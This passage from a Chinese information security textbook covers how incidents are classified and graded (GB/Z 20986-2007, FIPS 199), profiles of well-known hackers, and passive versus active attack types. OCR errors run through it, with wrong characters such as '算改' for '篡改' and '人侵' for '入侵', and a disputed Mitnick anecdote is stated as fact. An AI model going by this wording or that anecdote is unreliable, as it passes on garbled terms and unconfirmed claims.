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(7) OMI 一 一 其 他 有 害 程序 事件 (Other Malware Incidents) 。 


152 网 络 攻击 事件 


网 络 攻击 事件 (Network Attacks Incidents,NAI) 是 指 通过 网 络 或 其 他 技术 手段 , 利 
用 信息 系统 的 配置 缺陷 ,协议 缺陷 ,程序 缺 陷 或 使 用 暴力 攻击 对 信息 系统 实施 攻击 ,并 造 
成 信息 系统 异常 或 对 信息 系统 当前 运行 造成 潜在 危害 的 信息 安全 事件 。 其 中 包括 如 下 7 
个 子 类 : 

(1) DOSAI 一 一 拒绝 服务 攻击 事件 (Denial of Service Attacks Incidents)。 

(2) DBAI 一 一 后 门 攻击 事件 (Backdoor Attacks Incidents) 。 

(3) VAI 一 一 漏洞 攻击 事件 (Vulnerability Attacks Incidents)。 

(4) NSEI 一 一 网 络 扫描 窃听 事件 (Network Scan & Eavesdropping Incidents)。 

(5) PI 一 一 网 络 钓鱼 事件 (Phishing Incidents) 。 

(6) I 一 一 干扰 事件 (Interference Incidents)。 

(7) ONAI 一 一 其 他 网 络 攻击 事件 (Other Network Attacks Incidents)。 


153 信息 破坏 事件 


信息 破坏 事件 (Information Destroy Incidents,IDI) 是 指 通过 网 络 或 其 他 技术 手段 ， 
造成 信息 系统 中 的 信息 被 筑 改 .假冒 .泄露 窃取 等 而 导致 的 信息 安全 事件 。 其 中 包括 如 
下 6 个 子 类 ， 

(1) IAI 一 一 信息 算 改 事件 (Information Alteration Incidents) 。 

(2) IMI 一 一 信息 假冒 事件 (Information Masquerading Incidents)。 

(3) ILEI 一 一 信息 泄露 事件 (Information Leakage Incidents ) 。 

(4) II 一 一 信息 窃取 事件 (Information Interception Incidents ) 。 

(5) ILOI 信息 丢失 事件 (Information Loss Incidents) 。 

(6) OIDI 一 一 其 他 信息 破坏 事件 (Other Information Destroy Incidents)。 


154 信息 内 容 安全 事件 


信息 内 容 安全 事件 (Information Content Security Incidents,ICSI) 是 指 利用 信息 网 
络 发 布 ,传播 危害 国家 安全 .社会 稳定 和 公共 利益 内 容 的 安全 事件 。 其 中 包括 如 下 4 个 


子 类 ; 

(1) 违反 宪法 和 法 律 .行政 法 规 的 信息 安全 事件 。 

(2) 针对 社会 事项 进行 讨论 .评论 ,形成 网 上 敏感 的 与 论 热 点 ,出 现 一 定 规模 炒作 的 
信息 安全 事件 。 


(3) 组 织 串 连 ,煽动 集会 游行 的 信息 安全 事件 。 
(4) 其 他 信息 内 容 安全 事件 。 
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155 设备 设施 故障 


设备 设施 故障 (Facilities Faults,FF) 是 指 由 于 信息 系统 自身 故障 或 外 围 保障 设施 故 
障 而 导致 的 信息 安全 事件 ,以 及 人 为 地 使 用 非 技 术 手 段 有 意 或 无 意 地 造成 信息 系统 破坏 
而 导致 的 信息 安全 事件 。 其 中 包括 如 下 4 个 子 类 

(1) SHF 一 一 硬件 自身 故障 (Software and Hardware Faults)。 

(2) PSFF 一 一 外 围 保障 设施 故障 (Periphery Safeguarding Facilities Faults)。 

(3) MDA 一 一 人 为 破坏 事故 (Man-made Destroy Accidents)。 

(4) IF-OT 一 一 其 他 设备 设施 故障 (Instrument Faults-Others) 。 


156 灾害 性 事件 


灾害 性 事件 (Disaster Incidents,DD) 是 指 由 于 不 可 抗力 对 信息 系统 造成 物理 破坏 而 
导致 的 信息 安全 事件 。 灾 害 性 事件 包括 水 灾 、 台 风 、 地 震 、 雷 击 、. 塌 .火灾 、 丽 怖 袭击 , 战 
争 等 导致 的 信息 安全 事件 。 


157 其 他 事件 


其 他 事件 (Other Incidents, OD 类 别 是 指 不 能 归 为 以 上 6 个 基本 分 类 的 信息 安全 
事件 。 


16 安全 事件 分 级 


GB/Z 20986-2007《 信 息 安全 技术 信息 安全 事件 分 类 分 级 指南 ) 是 对 安全 事件 的 分 级 
方法 。 了 解 安全 事件 的 分 级 可 以 帮助 我 们 对 发 生 的 事件 有 一 个 更 好 的 处 理 与 解决 。 
其 中 主要 考虑 三 个 要 素 , 即 信息 系统 的 重要 程度 ,系统 损失 和 社会 影响 。 


1. 信息 系统 的 重要 程度 


信息 系统 的 重要 程度 主要 是 考虑 信息 系统 所 承载 的 业务 对 国家 安全 、 经 济 建 设 、 社 
会 生活 的 重要 性 ,以 及 业务 对 信息 系统 的 依赖 程度 ,把 信息 系统 划分 为 特别 重要 信息 系 
统 、 重 要 信息 系统 和 一 般 信息 系统 。 


2. 系统 损失 


系统 损失 是 指 由 于 信息 安全 事件 对 信息 系统 的 软 硬 件 、 功 能 以 及 数据 的 破坏 ,导致 
系统 业务 中 断 , 从 而 给 事 发 组 织 所 造成 的 损失 ,其 大 小 主要 考虑 恢复 系统 正常 运行 和 消 
除 安全 事件 负面 影响 所 需 付 出 的 代价 ,划分 为 特别 严重 的 系统 损失 、 严 重 的 系统 损失 、 较 
大 的 系统 损失 和 较 小 的 系统 损失 。 

(1) 特别 严重 的 系统 损失 是 指 造成 系统 大 面积 瘫痪 ,使 其 丧失 业务 处 理 能 力 ,或 系统 
关键 数据 的 保密 性 .完整 性 .可 用 性 遭 到 严重 破坏 ,恢复 系统 正常 运行 和 消除 安全 事件 负 
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面 影 响 所 需 付出 的 代价 十 分 巨大 ,对 于 事 发 组 织 是 不 可 承受 的 。 

(2) 严重 的 系统 损失 是 指 造成 系统 长 时 间 重 大 或 局 部 瘫痪 ,使 其 业务 处 理 能 力 受 到 
极 大 影响 ,或 系统 关键 数据 的 保密 性 、 完 整 性 、 可 用 性 遭 到 破坏 ,恢复 系统 正常 运行 和 消 
除 安全 事件 负面 影响 所 需 付出 的 代价 巨大 ,但 对 于 事 发 组 织 是 可 承受 的 。 

(3) 较 大 的 系统 损失 是 指 造成 系统 中 断 ,明显 影响 系统 效率 ,使 重要 的 信息 系统 或 一 
般 的 信息 系统 业务 处 理 能 力 受到 影响 ,或 系统 重要 数据 的 保密 性 、 完 整 性 .可 用 性 遭 到 破 
坏 ,恢复 系 统 正 常 运行 和 消除 安全 事件 负面 影响 所 需 付 出 的 代价 较 大 ,但 对 于 事 发 组 织 
是 完全 可 以 承受 的 。 

(4) 较 小 的 系统 损失 是 指 造成 系统 短暂 终端 ,影响 系统 效率 ,使 系统 业务 处 理 能 力 受 
到 影响 ,或 系统 重要 数据 的 保密 性 、 完 整 性 .可 用 人 性 遭 到 影响 ,恢复 系统 正常 运行 和 消除 
安全 事件 负面 影响 所 需 付出 的 代价 较 小 。 


3. 社会 影响 


社会 影响 是 指 信息 安全 事件 对 社会 所 造成 影响 的 范围 和 程度 ,其 大 小 主要 考虑 国家 
安全 ,社会 秩序 经 济 建设 和 公众 利益 等 方面 的 影响 ,划分 为 特别 重大 的 社会 影响 、 重 大 
的 社会 影响 、 较 大 的 社会 影响 和 一 般 的 社会 影响 。 

(1) 特别 重大 的 社会 影响 是 指 波及 一 个 或 多 个 省 市 的 大 部 分 地 区 , 极 大 威胁 国家 安 
全 ,引起 社会 动荡 ,对 经 济 建设 有 极其 恶劣 的 负面 影响 ,或 者 严重 损害 公众 利益 。 

(2) 重大 的 社会 影响 是 指 波及 一 个 或 多 个 地 市 的 大 部 分 地 区 ,威胁 到 国家 安全 ,引起 
社会 恐慌 ,对 经 济 建 设 有 重大 的 负面 影响 ,或 者 损害 到 公众 利益 。 

(3) 较 大 的 社会 影响 是 指 波 及 一 个 或 多 个 地 市 的 部 分 地 区 ,可 能 影响 到 国家 安全 , 扰 
乱 社 会 秩序 ,对 经 济 建设 有 一 定 的 负面 影响 ,或 者 影响 到 公众 利益 。 

(4) 一 般 的 社会 影响 是 指 波及 一 个 地 市 的 部 分 地 区 ,对 国家 安全 、 社 会 秩序 、 经 济 建 
设 和 公众 利益 基本 没有 影响 ,但 对 个 别 公 民 、 法 人 或 其 他 组 织 的 利益 会 造成 损害 。 

根据 信息 安全 事件 的 分 级 考虑 要 素 , 将 信息 安全 事件 划分 为 4 个 级 别 , 即 特别 重大 
事件 .重大 事件 、. 较 大 事件 和 一 般 事 件 。 


161 特别 重大 事件 ( 工 级 ) 


特别 重大 事件 是 指 能 够 导致 特别 严重 影响 或 破坏 的 信息 安全 事件 ,包括 以 下 情况 : 
(1) 会 使 特别 重要 的 信息 系统 遭受 特别 严重 的 系统 损失 。 
(2) 产生 特别 重大 的 社会 影响 。 


162 重大 事件 (级 ) 


重大 事件 是 指 能 够 导致 严重 影响 或 破坏 的 信息 安全 事件 ,包括 以 下 情况: 

(1) 会 使 特别 重要 的 信息 系统 遭受 严重 的 系统 损失 或 使 重要 的 信息 系统 遭受 特别 严 
重 的 系统 损失 。 

(2) 产生 的 重大 社会 影响 。 


12 


Hi:s 


163 较 大 事件 (上 级 ) 


较 大 事件 是 指 能 够 导致 较 严 重 影响 或 破坏 的 信息 安全 事件 ,包括 以 下 情况 : 

(1) 会 使 特别 重要 的 信息 系统 遭受 较 大 的 系统 损失 ,或 使 重要 的 信息 系统 遭受 严重 
的 系统 损失 ,一 般 的 信息 系统 遭受 特别 严重 的 损失 。 

(2) 产生 较 大 的 社会 影响 。 


164 一 般 事件 (V 级 ) 


一 般 事 件 是 指 不 满足 以 上 添加 的 信息 安全 事件 ,包括 以 下 情况 : 

(1) 会 使 特别 重要 的 信息 系统 遭受 较 小 的 系统 损失 ,或 使 重要 的 信息 系统 遭受 较 大 
的 系统 损失 ,一 般 的 信息 系统 遭受 严重 或 严重 以 下 级 别 的 系统 损失 。 

(2) 产生 一 般 的 社会 影响 。 


165 其 他 划分 方法 


安全 等 级 划分 方法 多 种 多 样 ,这 里 再 介绍 一 个 FIPS 199 中 的 安全 违规 对 个 人 或 组 
织 影响 的 划分 方法 。 


1. 低级 


对 于 组 织 的 运转 ,资产 或 者 个 人 的 负面 影响 造成 的 损失 有 限 。 有 限 的 负面 影响 是 指 
机 密 性 .完整 性 .可 用 性 的 损失 。 

(1) 在 一 定 程 度 上 引起 任务 处 理 能 力 以 及 组 织 完成 主要 功能 时 性 能 的 退化 , 且 功 能 
的 有 效 性 明显 降低 。 

(2) 造成 组 织 资产 的 轻微 损失 。 

(3) 造成 轻微 的 财政 损失 。 

(4) 对 个 人 造成 轻微 的 伤害 。 


2. 中 级 


给 组 织 的 运转 ,资产 或 者 个 人 带 来 严重 的 负面 影响 。 严 重 的 负面 影响 是 指 

(1) 在 一 定 程度 上 引起 任务 处 理 能 力 以 及 组 织 完 成 主要 功能 时 性 能 的 严重 退化 , 且 
功能 的 有 效 性 会 显著 降低 。 

(2) 造成 组 织 资产 的 严重 损失 。 

(3) 造成 严重 的 财政 损失 。 

(4) 对 个 人 造成 严重 伤害 ,但 不 至 于 失去 生命 或 者 造成 致命 伤 。 


3. 高 级 


给 组 织 的 运转 ,资产 或 者 个 人 带 来 巨大 或 灾难 性 的 负面 影响 。 巨 大 或 灾难 性 的 负面 
向 是 
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(1) 在 一 定 程度 上 引起 任务 处 理 能 力 以 及 组 织 完成 主要 功能 时 性 能 的 巨大 退化 或 
丧失 。 

(2) 造成 组 织 资产 的 巨大 损失 。 

(3) 造成 巨大 的 财政 损失 。 

(4) 对 个 人 造成 毁灭 性 的 伤害 ,失去 生命 或 者 造成 致命 伤害 。 


17 网 络 攻 击 概 迷 


171 黑客 概述 


1. 黑客 的 由 来 与 含义 


“黑客 ”, 源 自 英文 单词 Hacker。 这 个 词 在 莎士比亚 时 代 就 已 经 存在 ,但 在 计算 机 问 
世 后 才 使 这 个 词 名声 大 噪 。 人 们 普遍 认为 黑客 出 自 20 世纪 50 年 代 的 麻 省 理工 学 院 的 
实验 室 。 那 时 候 的 “黑客 "还 是 褒 义 词 , 指 的 是 对 计算 机 和 编程 理解 度 极 高 的 人 ,他 们 通 
过 各 种 创造 性 的 方法 来 推动 计算 机 技术 的 发 展 ,为 计算 机 技术 发 展 做 出 了 极 大 的 贡献 。 
也 是 他 们 第 一 次 提出 了 反对 计算 机 技术 垄断 ,推崇 “计算 机 为 人 民 所 用 ”的 观点 。 但 到 了 
20 世纪 80 一 90 年 代 , 计 算 机 已 经 成 为 未 来 的 趋势 ,重要 性 不 言 而 喻 。 但 信息 、 技 术 越 来 
越 集中 在 少数 人 手中 ,但 黑客 认为 信息 应 该 是 共享 的 。 此 时 也 逐渐 形成 了 分 享 、 自 由 、 免 
费 的 互联 网 精神 。20 世纪 90 年 代 也 是 中 国 互联 网 和 国际 互联 网 全 面 对 接 的 年 代 , 是 中 
国 黑客 的 启蒙 时 代 。 这 时 候 国内 热爱 计算 机 技术 的 青少年 受到 国外 黑客 技术 与 互联 网 
精神 的 影响 ,开始 研究 相关 技术 并 乐于 分 享 自 己 的 研究 成 果 。 此 时 的 黑客 潜心 研究 技 
术 ,并 没有 太 多 利益 上 的 瓜葛 ,是 黑客 较为 单纯 的 时 期 。 但 在 此 之 后 ,2001 年 中 美 撞 机 事 
件 的 发 生 , 导 致 了 世界 第 一 次 黑客 大 战 一 一 中 美 黑客 大 战 的 爆发 。“ 中 国 八 万 黑客 冲垮 
白宫 网 站 ”, 在 如 此 声浪 之 下 , 越 来 越 多 的 青年 人 被 黑客 文化 所 吸引 ,义无反顾 地 走 上 了 
这 条 道路 。 这 个 时 期 各 种 黑客 组 织 层出不穷 ,但 出 售 漏洞 .恶意 软件 也 日 益 增多 ,黑客 素 
质 良 落 不 齐 , 导 致 黑客 的 含义 有 了 新 变化 。 黑 客 已 经 转变 为 通过 网 络 非法 进入 他 人 计算 
机 系统 ,获取 、 算 改 或 破坏 数据 ,危害 信息 安全 的 入 侵 者 或 人 侵 行为 。 黑 客 已 经 成 为 了 利 
用 计算 机 进行 破坏 或 入 侵 他 人 计算 机 的 代言 词 ,但 实际 上 这 些 人 应 该 被 称 为 Cracker, 即 
中 文 的 骇 客 。 黑 客 随 着 技术 的 发 展 逐 渐 区 分 为 黑 帽子 和 白 帽 子 。 黑 帽子 是 指 利用 黑客 
技术 进行 破坏 的 组 织 或 个 人 , 白 帽子 指 的 是 精通 安全 技术 但 工作 在 反 黑 领域 的 组 织 或 个 
人 ,而 黑 帽 子 所 说 的 其 实 就 是 Cracker。 但 由 于 目前 这 两 个 词 已 经 普遍 用 “黑客 "来 表示 ， 
再 过 分 强调 这 两 个 词 的 差别 意义 并 不 大 。 


2. 知名 黑客 


1) 凯 文 。 米 特 尼克 
他 被 认为 是 世界 上 “头号 电脑 黑客 ”。 他 的 技术 也 许 不 是 最 好 的 ,但 却 是 最 臭名 昭著 
的 黑客 。17 岁 就 潜入 “北美 空中 防务 指挥 系统 ”的 计算 机 主机 内 , 翻 遍 了 美国 指向 前 苏联 
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及 其 盟国 的 所 有 核弹 头 的 数据 资料 。 美 国 司 法 部 将 他 称 为 “美国 历史 上 被 通缉 的 头号 计 
算 机 罪犯 ”。 联 邦 调查 局 甚至 通过 收买 他 的 朋友 来 进行 抓 捕 , 但 最 终 被 他 发 现 并 逃脱 。 
以 至 于 最 后 联邦 调查 局 请 到 了 被 称 为 “美国 最 出 色 的 电脑 安全 专家 ?的 日 裔 美 籍 计 算 机 
专家 下 村 勉 来 协助 调查 ,下 村 勉 经 过 漫长 而 艰难 的 缉拿 行动 才 将 他 抓获 。 他 接受 了 审 
判 ,但 全 世界 的 黑客 却 联合 起 来 一 致 要 求 释放 米 特 尼克 。 最 终 他 于 1999 年 出 狱 , 出 狱 后 
他 成 为 了 计算 机 安全 专家 顾问 与 演讲 者 , 著 有 《欺骗 的 艺术 兴 和 侵 的 艺术 兴 线 上 幽灵 : 
世界 头号 黑客 米 特 尼克 自传 ) 等 书 。 

2) 李 纳 斯 。 托 瓦 效 

著名 的 电脑 程序 员 、 黑 客 ,Linux 内 核 的 发 明 人 及 该 计划 的 合作 者 。 托 瓦 效 行 事 低 
调 , 但 坚持 开放 源 代 码 信念 ,并 促进 了 开源 代码 软件 观念 的 形成 。 他 坚信 牛顿 所 说 的 : 我 
之 所 以 能 够 看 得 更 远 ,是 因为 我 站 在 巨人 的 肩膀 上 。 因 此 他 反对 以 微软 为 代表 的 封闭 式 
软件 产权 的 传统 商业 模式 。 托 瓦 兹 也 被 誉 为 颠覆 世界 的 “自由 主义 教皇 ”。 现 受聘 于 开 
放 源 代码 开发 实验 室 全 力 开发 Linux 内 核 。 

3) 史 带 夫 ，。 乔 布 斯 和 斯 带 芬 ， 沃 兹 尼克 

苹果 公司 的 创始 人 。 他 们 早期 曾 利 用 电话 网 络 中 的 漏洞 免费 拨打 电话 ,并 创建 了 一 
款 盗用 长 途 电话 线路 的 “ 蓝 色 盒子 ”, 并 出 售 给 当地 的 大 学 生 使 用 。 乔 布 斯 在 离世 前 曾 表 
示 ,黑客 经 历 是 其 创建 苹果 的 必然 先驱 ,但 他 们 最 终 超越 了 黑客 行为 ,开始 专注 于 开发 计 
算 机 硬件 与 软件 。 

4) 理 查 德 。 马 修 。 斯 托 曼 

著名 黑客 ,GNU 计划 以 及 自由 软件 基金 会 的 创始 人 ,自由 软件 运动 的 精神 领袖 。 他 
所 拟定 的 GNU 通用 公共 许可 证 是 世上 最 广 为 采 用 的 自由 软件 许可 证 。 他 最 大 的 影响 是 
为 自由 软件 运动 构建 了 道德 ,政治 以 及 法 律 框架 。 他 并 不 是 从 软件 质量 的 角度 来 支持 开 
源 ,而 是 从 道德 角度 出 发 ,认为 只 有 附带 着 源 代 码 的 软件 才 是 符合 道德 标准 的 软件 ,反对 
类 似 数字 版 权 管理 之 类 的 政策 。 

5) 阿 德里 安 。 拉 莫 

著名 黑客 ,他 技术 高 超 , 但 居 无 定 所 ,行为 怪异 ,因此 被 称 为 “流浪 黑客 "或 “不 回 家 的 黑 
客 ”。 他 在 美国 四 处 漂泊 ,有 时 在 咖啡 店 ,有 时 在 朋友 家 ,有 时 在 图 书馆 ,利用 各 种 公用 网 络 
对 各 大 公司 进行 人 侵 。 但 在 入 侵 公 司 系 统 后 ,他 会 主动 免费 地 为 这 些 公司 修补 漏洞 。 

事实 上 在 计算 机 技术 飞速 发 展 的 今天 ,人 们 渐渐 明白 了 黑客 的 重要 性 。 很 多 公司 或 
组 织 现在 每 年 都 会 举办 黑客 大 赛 ,比如 Pwn2Own 黑客 大 赛 , 谷 歌 Pwnium 黑客 大 赛 等 。 
国内 黑客 团队 也 屡 创 佳绩 , 如 来 自 中 国 上 海 的 基 震 安全 研究 团队 (keenTeam) 在 
Pwn2Own 上 三 年 取得 了 五 个 冠军 ,来 自 北京 奇 虎 科技 有 限 公司 旗下 的 360VulcanTeam 
和 腾讯 公司 旗下 的 腾讯 电脑 管家 团队 也 取得 了 不 错 的 成 绩 。 当 然 这 只 是 冰山 一 角 , 国 内 
网 络 安全 的 从 业 人 员 逐 年 上 升 ,我 们 所 面临 的 安全 状况 只 会 越 来 越 复杂 。 


3. 黑客 的 发 展 趋势 


1) 黑客 攻击 “组 织 化 ”“ 合 法 化 ” 
经 过 了 多 年 黑客 的 肆虐 与 反 黑 技术 的 进步 ,现在 人 们 有 意识 并 且 有 能 力 将 计算 机 安 
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全 放 在 靠 前 的 位 置 进行 考虑 。 组 织 或 企业 在 开发 产品 时 越 来 越 注 重 漏洞 的 防 堵 , 在 日 常 
运营 时 也 会 采用 高 新 安全 产品 或 先进 技术 进行 计算 机 安全 的 防护 ,对 于 安全 管理 方面 ， 
网 络 安全 知识 的 普及 也 导致 了 人 为 因素 造成 的 损失 越 来 越 少 。 这 些 原因 导致 了 黑客 由 
个 人 渐渐 转变 为 组 织 的 形式 。 黑 客 以 组 织 的 形式 存在 ,内 部 成 员 可 以 相互 沟通 、 交 流 技 
术 , 共 同行 动 ,大 大 提高 了 入 侵 的 成 功率 ,所 造成 的 影响 不 言 而 喻 。 目 前 ,现在 有 很 多 黑 
客 组 织 , 例 如 , 某 某 黑客 联盟 、 红 客 联 盟 等 ,以 保护 国家 、 民 族 的 利益 对 其 他 国家 或 民族 进 
行 一 系列 的 网 络 攻击 。 种 种 迹象 看 起 来 黑客 行为 似乎 有 合法 化 的 趋势 ,但 在 目前 情况 
下 ,黑客 行为 还 是 一 种 违法 犯罪 行为 ,多 数 牵 扯 到 利益 且 目 的 不 一 。 但 在 国家 网 络 安全 
已 经 上 升 到 如 此 高 度 的 今天 ,由 国家 支撑 的 安全 威胁 主体 开始 出 现 ,很 多 新 兴 网 络 威胁 
绝 非 个 人 或 小 的 团体 组 织 所 能 实现 的 ,背后 都 有 国家 力量 的 影子 ,因此 其 实 并 不 排除 以 
后 国家 是 否 会 以 网 络 战 为 基础 出 台 相 关 法 律 法 规 。 

2) 黑客 攻击 工具 的 智能 化 ,攻击 过 程 实现 自动 化 

在 黑客 中 ,真正 能 够 自己 挖掘 漏洞 并 编写 利用 漏洞 代码 的 黑客 毕 竞 占 了 少数 ,大 部 
分 攻击 者 对 计算 机 原理 理解 并 不 透彻 ,只 懂得 编译 别人 的 代码 或 直接 使 用 别人 的 工具 ， 
这 样 的 攻击 者 我 们 称 之 为 “脚本 小 子 ”。“ 脚 本 小 子 ” 不 算 黑 客 , 他 们 不 注重 对 于 程序 语 
言 ,算法 或 数据 结构 的 研究 ,并 不 具备 成 为 黑客 来 说 所 必 备 的 素质 。 在 目前 已 经 形成 产 
业 化 的 计算 机 犯罪 中 ,主要 的 攻击 者 都 是 这 些 “ 脚 本 小 子 ”。 很 多 “脚本 小 子 ? 或 黑客 会 制 
作出 黑客 工具 放 在 不 同 站 点 供 大 家 下 载 ,黑客 所 能 运用 的 工具 大 概 已 经 几 千 种 。 有 一 部 
分 黑客 工具 是 为 了 简化 攻击 ,提高 效率 ,一 部 分 黑客 工具 是 因为 新 的 黑客 技术 不 断 出 现 ， 
也 有 一 部 分 黑客 工具 是 炫耀 个 人 技术 的 产物 。 很 多 新 的 工具 使 用 了 更 为 先进 的 技术 ,有 具 
备 了 诸如 隐藏 攻击 工具 、 随 机 选择 预定 的 决策 路 径 进 而 采用 不 同 的 攻击 方式 .采用 模块 
化 的 方式 进而 能 够 对 不 同 部 分 进行 升级 或 更 新 等 。 还 有 很 多 黑客 使 用 的 工具 是 网 络 安 
全 工具 ,比如 扫描 器 ,黑客 与 网 络 管理 员 都 可 以 拿 来 扫描 漏洞 ,但 黑客 是 为 了 入 侵 , 网 络 
管理 员 是 为 了 防范 入 侵 。 这 种 种 原因 使 得 黑客 工具 朝 着 越 来 越 智能 化 、 自 动 化 的 方向 
发 展 。 

3) 黑客 攻击 门槛 降低 ,技术 越 来 越 普及 ,整体 呈现 年 轻 化 

目前 说 来 ,我 们 走 进 书店 都 能 看 见 不 少 关于 黑客 技术 的 书 ,在 互联 网 上 更 是 比比 皆 
是 。 不 少 站 点 不 仅 有 视频 指导 .还 提供 相关 电子 书籍 、 中 英文 资料 进行 下 载 ,更 有 各 种 不 
同 的 黑客 工具 、 系 统 漏洞 等 可 以 获取 。 各 种 资源 毫 不 费劲 的 就 能 弄 到 手 ,各 种 黑客 工具 
不 仅 种 类 繁多 而 且 功 能 强大 ,漏洞 也 已 公开 化 ,这 与 计算 机 教育 的 普及 是 离 不 开 的 。 许 
多 国家 普及 计算 机 教育 ,让 每 个 学 生 都 会 使 用 计算 机 ,因此 年 轻 人 接触 网 络 安全 技术 也 
更 加 容易 接受 。 也 因为 黑客 工具 与 技术 的 大 量 普及 ,造成 了 自制 力 、 判 断 力 较 弱 的 年 轻 
人 误 入 歧途 。 更 重要 的 是 互联 网 法 律 法 规 和 网 络 道德 教育 的 不 完善 。 和 与 论 也 过 分 硅 大 
了 黑客 ,将 黑客 描述 成 网 络 中 无 所 不 能 的 英雄 .反抗 强权 的 斗士 .叛逆 的 天 才 等 形象 ,对 
青少年 造成 了 一 定 程 度 的 误导 。 

4) 黑客 所 造成 的 损失 增加 ,破坏 力 日 益 增强 

2014 年 中 国 网 站 被 攻击 次 数 共 38 858 次 ; 挂 马 事件 共 1313 次 ;恶意 网 站 共 285 999 050 
个 ;全 球 恶意 IP 共 1407 个 ;危害 次 数 达 319 252 次 之 多 。 不仅 是 攻击 次 数 惊 人 ,与 此 同 
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时 各 类 严重 漏洞 频 发 ,例如 ,心脏 出 血 漏洞 . 破 壳 漏洞 等 ,这 些 漏洞 不 仅 存在 非常 广泛 ,而 
且 有 些 是 无 法 完全 定位 修复 的 ,甚至 有 一 句 话 是 这 么 说 : 为 了 存放 通过 这 些 漏 洞 获 取 的 
数据 ,导致 了 硬盘 价格 上 涨 。 这 造成 的 损失 已 经 很 难 用 金钱 衡量 ,所 导致 的 是 “一 切 连接 
不 可 靠 ”。 黑 客 产业 链 所 涉及 范围 广泛 ,从 僵尸 网 络 到 私服 外 挂 再 到 数据 买卖 等 ,所 涉及 
的 金额 早已 突破 百 亿 ,造成 的 危害 更 是 巨大 。 


172 攻击 类 型 


有 一 个 普遍 的 安全 攻击 划分 方法 是 用 被 动 攻 击 和 主动 攻击 进行 划分 ,许多 教材 和 标 
准 均 是 采用 这 种 划分 方法 。 


1. 被 动 攻击 


被 动 攻击 中 ,攻击 者 窃听 或 监视 数据 信息 的 传输 ,但 不 对 数据 信息 进行 任何 修改 ,了 
解 和 利用 数据 信息 但 不 影响 系统 资源 。 被 动 攻击 通常 采取 的 形式 为 消息 内 容 泄露 攻击 
和 流量 分 析 攻 击 。 

1) 消息 内 容 泄露 攻击 

消息 内 容 泄露 攻击 所 指 的 是 我 们 在 信息 传递 的 过 程 中 信息 泄露 ,比如 电话 交谈 , 电 
子 邮 件 等 都 包含 敏感 信息 。 我 们 自然 不 会 轻易 透露 出 这 些 信息 ,除了 一 般 手 段 ,技术 手 
段 往往 采取 和 穷 听 方 式 , 窟 听 也 是 最 常见 的 技术 手段 。 大 多 数 网 络 通信 都 是 以 安全 性 较 低 
的 “明文 "进行 的 ,局 域 网 上 的 数据 传送 还 是 基于 广播 方式 的 。“ 明 文 ”方式 进行 的 只 要 获 
取 数 据 通信 路 径 就 可 以 轻易 被 黑客 获取 。 而 局 域 网 内 的 广播 则 有 可 能 使 一 台 主 机 收 到 
所 在 子 网 上 所 有 传送 的 信息 。 这 样 的 方式 ,虽然 不 破坏 数据 ,但 同样 造成 消息 内 容 的 泄 
露 。 窃 听 已 经 成 为 大 多 数 企业 的 网 管 员 所 面临 的 最 大 的 网 络 安全 问题 。 

2) 流量 分 析 攻 击 

除了 窃听 方式 ,最 常见 的 还 有 流量 分 析 的 攻击 方式 。 流 量 分 析 攻 击 方式 运用 在 消息 
内 容 已 经 被 掩盖 而 无 法 获取 消息 的 真实 内 容 。 通 常 掩盖 的 技术 手段 是 加 密 , 但 攻击 者 还 
是 可 以 观察 这 些 数据 报 的 模式 ,可 以 推测 出 通信 双方 的 位 置身 份 ,分 析出 通信 次 数 和 消 
息 的 长 度 ,从 而 获取 相关 的 敏感 信息 。 

对 被 动 攻击 的 检测 难度 很 大 ,因为 大 多 数 情况 下 被 动 攻击 并 不 改变 数据 。 当 通信 双 
方 都 在 进行 正常 通信 时 ,很 难 发 现 是 否 有 第 三 方 已 经 获取 了 通信 信息 或 者 进行 流量 分 
析 。 但 是 对 被 动 攻 击 是 可 以 进行 有 效 防 范 的 ,因此 抗击 被 动 攻击 以 预防 为 主 。 例 如 , 采 
用 加 密 技术 、 虚 拟 专 用 网 络 等 手段 。 被 动 攻击 一 般 情况 下 也 不 会 被 发 现 ,因为 它 在 大 多 
数 情况 下 是 主动 攻击 的 前 奏 。 


2. 主动 攻击 


主动 攻击 会 自 改 数据 流 或 添加 错误 的 数据 流 , 攻 击 者 会 试图 改变 系统 资源 或 影响 系 
统 操 作 。 这 类 攻击 具体 包括 重 放 、 算 改 、 伪 造 和 拒绝 服务 。 

1) 重 放 

重 放 指 的 是 攻击 者 发 送 一 个 目的 主机 接收 过 的 包 , 从 而 实现 系统 被 欺骗 的 目的 。 这 
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种 攻击 方法 是 在 身份 认证 的 过 程 中 不 断 恶 意 地 或 欺诈 性 地 重复 发 送 或 者 拖延 发 送 一 个 
有 效 的 数据 单元 ,以 此 来 产生 一 个 非 授 权 的 效应 ,破坏 认证 的 正确 性 。 加 密 可 以 防止 会 
话 劫持 ,但 防止 不 了 重 放 攻 击 。 重 放 攻 击 是 对 协议 的 攻击 中 危害 最 大 、 最 常见 的 一 种 攻 

2) 算 改 

算 改 指 的 是 一 个 合法 消息 的 某 些 部 分 被 改变 、 删 除 ,或 者 消息 被 延迟 、 被 重 排 ,通常 
产生 一 个 未 授权 的 效应 。 例 如 ,一 条 “允许 小 陈 进行 数据 库 操作 ”的 消息 被 臭 改 为 “允许 
小 成 进行 数据 库 操作 ”。 

3) 伪造 

伪造 指 的 是 一 个 实体 发 出 含有 其 他 实体 身份 信息 的 数据 信息 ,假冒 成 其 他 实体 ,用 
欺骗 的 方式 获取 合法 用 户 的 权利 。 伪 造 攻击 通常 夹杂 在 其 他 主动 攻击 方式 中 。 例 如 , 先 
进行 重 放 攻击 ,使 一 个 具有 较 少 特权 但 经 过 认证 的 实体 得 到 其 他 特权 实体 的 额外 特权 。 

4) 拒绝 服务 

拒绝 服务 就 是 人 们 熟知 的 DoS(Deny of Service) , 它 可 以 阻止 或 禁止 对 通信 设备 的 
正常 使 用 或 管理 。 不 只 是 对 网 络 带 宽 进 行 消耗 性 攻击 ,能 使 服务 暂停 的 攻击 都 属于 拒绝 
服务 攻击 。 此 类 攻击 利用 的 是 网 络 协议 本 身 的 安全 缺陷 ,因此 一 直 得 不 到 较为 合理 的 解 
决 。 它 具体 有 两 种 效果 : 第 一 种 是 迫使 服务 器 缓冲 区 满 ,使 新 的 请 求 无 法 接收 ;第 二 种 是 
使 用 IP 欺骗 ,让 服务 器 把 合法 用 户 的 连接 复位 ,从 而 影响 合法 用 户 的 连接 。 

主动 攻击 与 被 动 攻击 不 同 ,被 动 攻 击 容易 防范 而 难以 检测 ,但 主动 攻击 则 是 容易 检 
